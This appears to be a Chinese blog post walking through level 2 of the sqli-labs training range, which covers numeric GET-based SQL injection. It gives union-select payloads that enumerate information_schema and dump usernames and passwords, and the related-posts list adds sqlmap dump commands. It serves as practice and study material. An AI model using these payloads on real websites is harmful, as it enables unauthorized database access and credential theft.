sqli-labs关卡2(基于get提交的数字型注入)通关思路

已于 2024-01-16 19:45:42 修改
阅读量252 收藏 2
点赞数 9
分类专栏: # sqi-labs的1-4关通关详解 文章标签: web安全 sql
于 2023-10-21 23:57:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyh1588/article/details/133967338
版权

文章目录

前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!

一、回顾第一关知识点

上节文章讲到sql注入的最常规思路,(指mysql数据库且针对靶场的思路)先分别用and 1=1 和 and 1=2判断注入点类型,然后order by猜字段数爆显位找注入点位置,其次是联合查询(union select)爆数据库、表、列、数据。依次循序渐进。

二、靶场第二关思路

  • 1、判断注入点
  • 2、爆字段个数
  • 3、爆显位位置
  • 4、爆数据库名、版本、用户等等
  • 5、爆数据库表名
  • 6、爆数据库列名
  • 7、爆数据库数据

1、判断注入点

(如图所示)这里我们老规矩抛出and 1=1 和 and 1=2测试,发现1=1页面正常,1=2报错了。这显然是数字型的sql注入。
在这里插入图片描述
在这里插入图片描述

2.爆字段个数

(如图所示)注入语句为id=1 order by 1 数字1逐次提升发现是4报错。说明字段数为3。
在这里插入图片描述

3、爆显位位置

(如图所示)注入语句为id=-1 union select 1,2,3至于为什么这里id变成-1了,可以看第一关讲解,其实是为了让数据库查询不到信息而返回错误,来巧妙返回我们的注入语句。

在这里插入图片描述

4、爆数据库名、版本、用户等等

(如图所示)注入语句为id=-1 union select 1,user(),database()
这里查询版本就不演示了。

在这里插入图片描述

5、爆数据库表名

(如图所示)注入语句为id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
发现最可疑的表名是users

在这里插入图片描述

6、爆数据库列名

(如图所示)注入语句为id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="users"
得到最可疑列为password和username

在这里插入图片描述

7、爆数据库数据

(如图所示)注入语句为id=-1 union select 1,group_concat(username),group_concat(password) from users
得到数据
在这里插入图片描述

三、总结

这是基于get提交的数字型注入,与第一关唯一不同的就是一个是字符型,一个是数字型,其他的过程没什么区别。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

无名小卒且不会安全的zzyyhh
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-2
m0_63190830的博客
07-08 169
sqli基础题
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs学习笔记
shayebudon的博客
10-06 1774
简单的SQL注入 选择:2017 A1 Extract Data-User info 在登录界面就可以使用SQL语句,以此来检查下平台是否搭建成功 用户名框输入一个“\”,点击确认键,可以看到报错信息,并且可以看到SQL语句,说明存在SQL注入,此处无过滤。 可以通过查看报错信息中的SQL语句,选择进行SQL注入的方式,这里可以看到这样的一行: 那么,选择在用户名输入处输入“‘ or 1=1 #”,通过使用“or”字句将输入匹配取消,并使用“#”将后续语句中对passwo...
sqli-labs练习(第二关)——数字型
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-17 1722
1、先判断是字符型还是数字型。 172.16.11.222/sqli-labs/Less-2/?id=1 id=2-1 与 id=1的结果一样,说明是数字型。 2、确认字段位数 172.16.11.222/sqli-labs/Less-2/?id=1 order by 3 一共3位 3、确认占位信息 172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,3 --+ 4、找库名 http://172.16.11.222/sqli-labs/Less-
sqli-labs(2)
jimggg的博客
03-17 299
一上来一顿单引号,双引号,单括号,双括号or and测试,都不行,拿sqlmap跑一下子 唉,大意了不是,最简单的数字型注入,开整 http://192.168.1.21/sqli-labs-master/Less-2/?id=1 order by 3–+ 正常显示,列查询3,接着暴库,这题我就不上这么多图了,偷懒!!! http://192.168.1.21/sqli-labs...
SQL注入Sqli-labs第二关
走马
11-06 519
MYSQL数据库的所有表的信息都存储在了information_schema数据库里面的tables这个表里(information_schema.tables中两列table_schema是数据库名,table_name中表名。6.一般账号与密码都会存储在users这个表里面,所以我们要去查看users这个表里面的值,为了需要准确的得出账号与密码,可以先对里面的字段进行查询(information_schema.columns表中三列table_schema是数据库名,本次注入sql-labs的第二关。
sqli - labs - 2
m0_62102000的博客
06-30 163
Less-2GET-Error based- Intiger based
SQLI-LABS(二)
weixin_52398420的博客
11-26 269
SQLI-LABS(二) 前四关流程: 1、判断是否存在sql注入漏洞 2、使用order by 查看列数 3、使用联合查询判断回显位置 4、在回显位置处注入sql语句进行查询 **我们可以在sql文件中每一关文件中的index.php中写入代码 echo $sql; echo “< br >”; 以方便做题时查看sql语句; ** Less-1: ** 1、判断:?id=1’ 在这里插入图片描述 出现报错,证明存在sql漏洞,其中 报错信息 为’‘1’’ LIMIT 0,1’ at line
sqli-labs(Page 2)
Lorezon的博客
04-12 244
Less-21
sqli-labs】Less2——数字型注入
用博客做做记录的小白
06-08 82
sqli-labs靶场第二关Less2数字型注入
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sqli-labs 1-5关
qq_41326328的博客
03-28 1190
这次写一个关于sql注入的闯关游戏,叫sqli-liabs,这个源码在网上搜索一下sqli-liabs源码下载,放到phpstudy环境里, 注意:这里把phpstudy版本调到5.5,别问我为什么,厂长是我的表哥 下面先说一下, 注入分为数字型注入和字符串型注入 区别: ?id=1 and 1=1 ?id=2 and 1=2 回显不一致则为数字型注入,回显一致的话再继续判断 ?di=1’ ...
sqli-labs注入之2至4关
qq_51954912的博客
03-13 184
前言:此部分主要记录sqli-labs闯关2-4,其中我觉得最重要的如何判断闭合符号 sqli-labs注入二至四关第二关第三关第四关 第二关 首先判断是整形注入还是字符型注入 由上图可知为数值型注入,即不需任何闭合符号。 判断列数 可知列数为3 判断显示位 爆出数据库 由数据库得出表名 ?id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=
Sqli-labs靶场第2关详解[Sqli-labs-less-2]
最新发布
m0_73615178的博客
02-19 488
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 2万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs第二关
yuqnqi的博客
05-06 196
sqli-labs第二关
sqli-labs注入靶场通关
07-28
SQLMap是一个开源的SQL注入自动化工具,可以帮助你通过SQLi-Labs靶场。使用SQLMap,你需要熟悉基本的命令行语法,并了解SQL注入的基本原理。为了使用SQLMap通过SQLi-Labs靶场,你可以尝试使用以下命令: ``` sqlmap -u <target URL> --dbs ``` 这将列出数据库列表。接下来,你可以使用以下命令枚举数据表: ``` sqlmap -u <target URL> -D <database name> --tables ``` 最后,你可以使用以下命令读取数据表中的数据: ``` sqlmap -u <target URL> -D <database name> -T <table name> --dump ``` 请注意,在实际渗透测试中,使用SQLMap和其他工具需要遵循道德准则和法律规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无名小卒且不会安全的zzyyhh

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值